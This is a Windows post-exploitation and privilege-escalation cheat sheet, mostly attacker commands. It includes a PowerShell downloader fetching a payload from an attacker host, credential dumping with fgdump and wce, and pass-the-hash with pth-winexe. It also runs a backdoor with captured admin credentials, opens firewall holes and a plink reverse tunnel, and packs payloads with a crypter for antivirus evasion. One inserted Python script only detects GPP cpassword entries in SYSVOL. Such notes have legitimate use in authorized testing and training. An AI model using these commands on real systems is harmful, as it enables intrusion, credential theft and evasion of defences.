Windows Second-Pass Enumeration (Post Exploitation) + Privilege Escalation


Cross Compile from Kali

Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c

Transpile Python into exe

Kali> python pyinstaller.py --onefile file.py

Upload files

# debug.exe
Kali> cp /usr/share/windows-binaries/nc.exe .
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt

# Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

LDAP

TODO

# Sources
http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html

Dump Hashes

C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

# Links
TODO

WCE

C:\> wce -w

# Links
TODO

PSExec

# Overview
You need to be an admin already: it copies an executable to an admin share, registers it as a service and starts it.

if you wanna be really disruptive you could also drop a payload that kills the proxied service and listens on that port instead

# Links
https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
https://sourceforge.net/projects/winexe/
https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
http://www.powershellempire.com/?page_id=523

UAC ByPass

TODO

# Links
https://github.com/hfiref0x/UACME

WMIC

TODO

# Links
https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py

Scheduled Tasks

TODO

# Links
TODO

Insecure Services

TODO

# Links
TODO

Insecure File Permissions

C:\> icacls example.exe

# Links
http://www.greyhathacker.net/?p=738

Insecure SYSVOL

C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt
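An added audit script for the SYSVOL check above (not part of this cheat sheet): it walks a mounted SYSVOL copy, parses the Group Policy Preference XML files and reports every entry that still carries a cpassword attribute, so the affected GPOs can be located and cleaned up. It only detects and does not decrypt anything; the sample Groups.xml and the list of GPP file names are constructed for the example.

```python
"""Audit a SYSVOL copy for Group Policy Preference files that still embed a
cpassword attribute (the MS14-025 weakness). Detection only: nothing is decrypted."""
import os
import xml.etree.ElementTree as ET

# GPP XML files that can carry credentials (constructed list of file names)
GPP_FILES = ("Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml")
# Attributes that name the account an entry applies to, in order of preference
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def find_cpassword(xml_text):
    """Return (element_tag, account) for each Properties element whose
    cpassword attribute is non-empty; delete-only entries have none."""
    hits = []
    root = ET.fromstring(xml_text)
    for parent in root.iter():
        for props in parent.findall("Properties"):
            if props.get("cpassword"):
                account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "?")
                hits.append((parent.tag, account))
    return hits


def scan_sysvol(path):
    """Walk a SYSVOL mount (e.g. the Z: drive mapped above) and report every
    GPP file that still has a cpassword, plus files that fail to parse."""
    report = []
    for dirpath, _, files in os.walk(path):
        for name in files:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8-sig", errors="replace") as fh:
                try:
                    for tag, account in find_cpassword(fh.read()):
                        report.append((full, tag, account))
                except ET.ParseError as exc:
                    report.append((full, "PARSE_ERROR", str(exc)))
    return report


# Constructed sample Groups.xml: one entry with a cpassword, one delete-only entry
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin">
    <Properties action="U" cpassword="Y29uc3RydWN0ZWQtcGxhY2Vob2xkZXI=" userName="localadmin"/>
  </User>
  <User name="guest">
    <Properties action="D" userName="guest"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    print(find_cpassword(SAMPLE_GROUPS_XML))  # [('User', 'localadmin')]
```

Run `scan_sysvol(r"Z:\")` against the mapped share to get one line per affected GPO file; the fix is to delete the preference item and rotate the credential it carried.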

Token Stealing

Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain.

# Links
TODO

Pass the Hash

Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

# Links
https://github.com/byt3bl33d3r/pth-toolkit

Process Injection

TODO

# Links
https://github.com/n1nj4sec/pupy
http://www.powershellempire.com/?page_id=273

runas

TODO

# Links
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps
https://ss64.com/nt/runas.html

Encapsulate SSH traffic with httptunnel

# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
[System.Diagnostics.Process]::Start("C:\windows\temp\backdoor.exe","", $mycreds.Username, $mycreds.Password, $computer)

powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389:127.0.0.1:3389 208.68.234.99 -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/Hyperion-1.0.zip .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe
https://github.com/secretsquirrel/SigThief

Resources

http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/pentestmonkey/windows-privesc-check
https://github.com/GDSSecurity/Windows-Exploit-Suggester
https://foxglovesecurity.com/2016/01/16/hot-potato/
http://hkashfi.blogspot.com/2008/04/bypassing-firewalls-with-port_23.html

https://www.youtube.com/watch?v=kMG8IsCohHA
https://www.youtube.com/watch?v=PC_iMqiuIRQ